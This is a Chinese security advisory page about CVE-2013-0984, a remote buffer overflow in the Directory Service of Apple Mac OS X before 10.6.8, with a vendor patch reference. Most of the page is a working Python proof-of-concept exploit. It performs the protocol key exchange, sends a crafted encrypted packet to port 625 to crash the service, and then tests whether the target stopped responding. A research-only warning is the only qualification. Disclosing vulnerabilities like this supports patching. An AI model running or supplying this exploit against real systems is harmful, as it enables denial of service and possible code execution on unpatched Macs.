首页 / 操作系统 / Linux / Apple Mac OS X Directory Service远程缓冲区溢出漏洞(CVE-2013-0984)
发布日期:2013-06-04 更新日期:2013-06-07受影响系统: Apple Mac OS X < 10.6.8 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 60328 CVE(CAN) ID: CVE-2013-0984
Apple Mac OS X是苹果电脑操作系统软件。
Apple Mac OS X 10.6.8之前版本的目录服务存在远程缓冲区溢出漏洞,远程攻击者通过特制的消息利用此漏洞可执行任意代码或造成拒绝服务。
<*来源:Nicolas Economou
链接:http://support.apple.com/kb/HT5784 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! from Crypto.Cipher import AES import socket import struct import time def send_packet(sock, data): packet = "" packet += "DSPX" packet += struct.pack(">I", len(data)) packet += data sock.send(packet) def get_crypted_data(shared_key, data): cipher = AES.new(shared_key, AES.MODE_CBC, "x00" * 16) crypted_data = cipher.encrypt(data) return crypted_data def attack(ip, port): try: p = socket.socket() p.connect((ip, port)) except Exception, e: print e return data = "" data += "DHN2" data += "x00" * 63 + "x02" # Key that generates a DERIVED KEY, identical to the one received. # Packet 1 print ("
Sending my public key ...") send_packet(p, data) resp = p.recv(65536) # Key sent by server. key_sent = resp[8: len(resp) - 1] server_key = "" # Flip the number. for i in range(len(key_sent) - 1, -1, -1): server_key += key_sent[i] # String to (a huge) number conversion. big_number = "" for c in server_key: big_number += "%.2x" % ord(c) big_number = int(big_number, 16) prime = 2 ** 128 # Obtaining the SHARED KEY (To be use for AES encryption). derived_key = pow(big_number, 1, prime) magic_number = derived_key derived_key_string = "" # Transform key into a string. while magic_number != 0: resto = magic_number % 256 magic_number /= 256 derived_key_string += struct.pack("B", resto)[0] print "shared key: %s" % repr(derived_key_string) # Handshake. print "Sending the Handshaking" data = "A" * 4 + ("x0c" * 12) crypted_data = get_crypted_data(derived_key_string, data) send_packet(p, crypted_data) resp = p.recv(65536) data = "" data += "A" * 0x1b data += "x02" data += struct.pack("<I", 0x10000000) # Evil value. data += struct.pack("<I", 0x100) # Value to be used by the last patched version. data += "A" * ( 0x34 - len(data) ) data += struct.pack(">I", 0x1172 + 1) # Operation code. data += struct.pack(">I", 0x99999999) data += struct.pack(">I", 0x80808080) data += struct.pack(">I", 0x81818181) data += struct.pack(">I", 0x66666666) data += "B" * (0xe0 - len( data)) # Bypass in previous Mac OSX versions ( Integer underflow -> ( ( 0xe0 + 0x10 ) - 0x100 ) data += "x00" * 16 crypted_data = get_crypted_data(derived_key_string, data) # TRIGGER print ( "Sending the evil packet" ) send_packet(p, crypted_data) p.settimeout(10) try: p.recv(65536) except Exception, e: print e p.close() try: print ( "
waiting 10 seconds for check ..." ) time.sleep(10) p = socket.socket() p.settimeout(10) p.connect(( ip, port )) except Exception: print ( "
The attack was successful !
" ) return print ( "
The attack wasn"t successful
" ) return ip = "192.168.100.1" port = 625 attack(ip, port)建议: -------------------------------------------------------------------------------- 厂商补丁:
Apple ----- Apple已经为此发布了一个安全公告(HT5784)以及相应补丁: HT5784:About the security content of OS X Mountain Lion v10.8.4 and Security Update 2013-002 链接:http://support.apple.com/kb/HT5784
补丁下载:http://www.apple.com/support/downloads/Apple Mac OS X 多个安全漏洞研究人员发现至今最先进的 Android 木马相关资讯 Mac OS X安全漏洞
Apple Mac OS X Server多个跨站脚 (09/22/2013 18:19:44)
Apple Mac OS X CFNetwork Private (06/08/2013 05:10:44)
Apple Mac OS X 多个安全漏洞 (06/07/2013 15:48:39)
Apple Mac OS X Text Glyphs远程代 (06/08/2013 05:11:24)
Apple Mac OS X Text Tracks远程代 (06/08/2013 05:09:44)
易网时代-编程资源站